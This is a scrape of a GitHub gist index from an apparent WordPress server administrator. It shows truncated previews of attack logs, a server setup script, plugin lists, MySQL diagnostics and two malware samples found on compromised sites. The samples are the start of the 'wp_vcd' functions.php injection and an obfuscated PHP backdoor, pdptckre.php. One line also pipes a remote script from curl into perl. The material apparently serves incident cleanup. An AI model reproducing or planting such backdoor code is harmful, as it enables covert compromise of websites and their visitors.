Salvador Aguilar malwador
⚔️
malwador
/ index.php-original
Created
July 15, 2017 09:19
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * Front to the WordPress application. This file doesn't do anything, but loads | |
| * wp-blog-header.php which does and tells WordPress to load the theme. | |
| * | |
| * @package WordPress | |
| */ | |
| /** | |
| * Tells WordPress to load the WordPress theme and output it. |
malwador
/ gist:7b6582fd4e07f6b39972cf4ff252e978
Created
July 17, 2017 18:45
UK IPs Attacking discoversjds.com XMLRPC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@discoversjds:/var/log/nginx# tail -f access.log | |
| 185.188.204.27 - - [17/Jul/2017:14:43:59 -0400] "POST /xmlrpc.php HTTP/1.0" 499 0 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)" | |
| 185.188.204.25 - - [17/Jul/2017:14:44:00 -0400] "POST /xmlrpc.php HTTP/1.0" 502 568 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)" | |
| 185.188.204.27 - - [17/Jul/2017:14:44:00 -0400] "POST /xmlrpc.php HTTP/1.0" 502 568 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)" | |
| 185.188.204.25 - - [17/Jul/2017:14:44:04 -0400] "POST /xmlrpc.php HTTP/1.0" 499 0 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)" | |
| 185.188.204.27 - - [17/Jul/2017:14:44:04 -0400] "POST /xmlrpc.php HTTP/1.0" 502 568 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)" | |
| 185.188.204.25 - - [17/Jul/2017:14:44:07 -0400] "POST /xmlrpc.php HTTP/1.0" 499 0 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)" | |
| 185.188.204.27 - - [17/Jul/2017:14:44:08 -0400] "POST /xmlrpc.php HTTP/1.0" 502 568 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows |
malwador
/ gist:29a9b925deaa8b00e35b7178d445714b
Last active
August 9, 2017 02:13
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sudo su | |
| apt-get update | |
| apt-get install nginx php5-fpm mariadb-server php5-mysql curl php5-curl fail2ban iptraf mtr monit git vim | |
| curl -O https://raw.githubusercontent.com/wp-cli/builds/gh-pages/phar/wp-cli.phar | |
| chmod +x wp-cli.phar | |
| sudo mv wp-cli.phar /usr/local/bin/wp |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| +------------------------------------------------+----------+--------+------------+ | |
| | name | status | update | version | | |
| +------------------------------------------------+----------+--------+------------+ | |
| | acf-content-analysis-for-yoast-seo | active | none | 2.0.1 | | |
| | acf-option-pages | inactive | none | 1.1.0 | | |
| | acf-to-rest-api | inactive | none | 3.1.0 | | |
| | user-role-field-setting-for-acf-o | inactive | none | 2.1.12 | | |
| | adminimize | inactive | none | 1.11.4 | | |
| | acf-2way-pr | inactive | none | 1.0.3 | | |
| | acf-field-date-time-picker | inactive | none | 2.1.5 | |
malwador
/ functions.php
Created
April 6, 2018 21:37
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $div_code_name = "wp_vcd"; | |
| $funcfile = __FILE__; | |
| if(!function_exists('theme_temp_setup')) { | |
| $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI]; | |
| if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { | |
| function file_get_contents_tcurl($url) |
malwador
/ gist:30bfbea72227549b9f2834f0d95c39e2
Created
June 15, 2018 02:48
Para Alejandro Rodriguez
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 999 gracias | |
| 998 gracias | |
| 997 gracias | |
| 996 gracias | |
| 995 gracias | |
| 994 gracias | |
| 993 gracias | |
| 992 gracias | |
| 991 gracias | |
| 990 gracias |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Jul 5 07:34:39 KpF-honestbrew mysqld[109088]: 2018-07-05 7:34:39 139851464473344 [Warning] Aborted connection 6819 to db: 'honestbrew' user: 'honestbrew' host: 'localhost' (Got timeout reading communication packets) | |
| Jul 5 07:47:38 KpF-honestbrew mysqld[109088]: 2018-07-05 7:47:38 139851480406784 [Warning] Aborted connection 7478 to db: 'honestbrew' user: 'honestbrew' host: 'localhost' (Got timeout reading communication packets) | |
| Jul 5 09:50:46 KpF-honestbrew mysqld[109088]: 2018-07-05 9:50:46 139851533413120 [Warning] Aborted connection 16249 to db: 'honestbrew' user: 'honestbrew' host: 'localhost' (Got timeout reading communication packets) | |
| Jul 5 10:07:27 KpF-honestbrew mysqld[109088]: 2018-07-05 10:07:27 139851533413120 [Warning] Aborted connection 17923 to db: 'honestbrew' user: 'honestbrew' host: 'localhost' (Got timeout reading communication packets) | |
| Jul 5 10:08:53 KpF-honestbrew mysqld[109088]: 2018-07-05 10:08:53 139851480709888 [Warning] Aborted connection 18135 to db: 'honestbrew' user: 'hones |
malwador
/ mysqltuner.pl output
Last active
July 5, 2018 16:32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@KpF-honestbrew:~# curl -s https://raw.githubusercontent.com/major/MySQLTuner-perl/master/mysqltuner.pl | perl | |
| >> MySQLTuner 1.7.9 - Major Hayden <[email protected]> | |
| >> Bug reports, feature requests, and downloads at http://mysqltuner.com/ | |
| >> Run with '--help' for additional options and output filtering | |
| [--] Skipped version check for MySQLTuner script | |
| [OK] Logged in using credentials from debian maintenance account. | |
| [OK] Currently running supported MySQL version 10.1.32-MariaDB-1~xenial | |
| [OK] Operating on 64-bit architecture |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| www.gizmoids.com 179.61.232.209 [08/Sep/2018:12:09:44 +0000] POST "/forums/board/companies-and-business/" HTTP/1.0 302 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0" "-" 179.61.232.209 1 1 "/" "index" php "" 0 - 0 403 1.383 1.385 | |
| www.gizmoids.com 179.61.232.209 [08/Sep/2018:12:09:45 +0000] POST "/forums/topic/cheap-prazosin-for-sale-online-no-prescription-required-buy/" HTTP/1.0 200 "https://www.gizmoids.com/forums/board/companies-and-business/" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0" "-" 179.61.232.209 1 1 "/" "index" php "" 0 - 46287 46678 0.144 0.144 | |
| www.gizmoids.com 179.61.232.209 [08/Sep/2018:12:10:25 +0000] POST "/forums/board/companies-and-business/" HTTP/1.0 302 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0" "-" 179.61.232.209 1 1 "/" "index" php "" 0 - 0 407 1.428 1.428 | |
| www.gizmoids.com 179.61.232.209 [08/Sep/2018:12:10:26 +0000] POST "/forums/topic/mail-order-digitalis-legitimate-buy-digitalis-and-c |
malwador
/ pdptckre.php
Last active
October 12, 2018 19:55
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wp-admin/images/pdptckre.php | |
| <?php | |
| $ocivvt = 'Hi-x*4\'yt63m8fa#sk02nrpgbe_o7d5ulvc';$ohglloc = Array();$ohglloc[] = $ocivvt[10].$ocivvt[30].$ocivvt[29].$ocivvt[30].$ocivvt[28].$ocivvt[34].$ocivvt[12].$ocivvt[34].$ocivvt[2].$ocivvt[25].$ocivvt[18].$ocivvt[25].$ocivvt[18].$ocivvt[2].$ocivvt[5].$ocivvt[18].$ocivvt[18].$ocivvt[9].$ocivvt[2].$ocivvt[24].$ocivvt[19].$ocivvt[13].$ocivvt[18].$ocivvt[2].$ocivvt[29].$ocivvt[28].$ocivvt[30].$ocivvt[12].$ocivvt[14].$ocivvt[12].$ocivvt[34].$ocivvt[10].$ocivvt[29].$ocivvt[30].$ocivvt[25].$ocivvt[28];$ohglloc[] = $ocivvt[0].$ocivvt[4];$ohglloc[] = $ocivvt[15];$ohglloc[] = $ocivvt[34].$ocivvt[27].$ocivvt[31].$ocivvt[20].$ocivvt[8];$ohglloc[] = $ocivvt[16].$ocivvt[8].$ocivvt[21].$ocivvt[26].$ocivvt[21].$ocivvt[25].$ocivvt[22].$ocivvt[25].$ocivvt[14].$ocivvt[8];$ohglloc[] = $ocivvt[25].$ocivvt[3].$ocivvt[22].$ocivvt[32].$ocivvt[27].$ocivvt[29].$ocivvt[25];$ohglloc[] = $ocivvt[16].$ocivvt[31].$ocivvt[24].$ocivvt[16].$ocivvt[8].$ocivvt[21];$ohglloc[] = $ocivvt[14].$ocivvt[21].$ |